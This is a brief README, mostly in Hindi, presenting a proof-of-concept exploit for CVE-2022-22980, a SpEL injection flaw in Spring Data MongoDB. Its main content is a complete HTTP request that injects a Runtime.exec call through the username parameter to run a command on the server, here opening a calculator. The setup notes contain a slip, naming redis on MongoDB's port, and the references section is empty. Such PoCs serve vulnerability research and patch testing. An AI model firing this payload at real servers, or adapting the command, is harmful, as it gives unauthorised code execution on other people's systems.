
CVE-2022-22980 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Spring Data MongoDB में username पैरामीटर में SpEL इंजेक्शन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।
एक तुच्छ कमजोरी, बस एक रिकॉर्ड।
redis शुरू करें, पोर्ट 27017
प्रोजेक्ट शुरू करें, springboot पोर्ट 6666 पर शुरू होता है


GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
संदर्भ: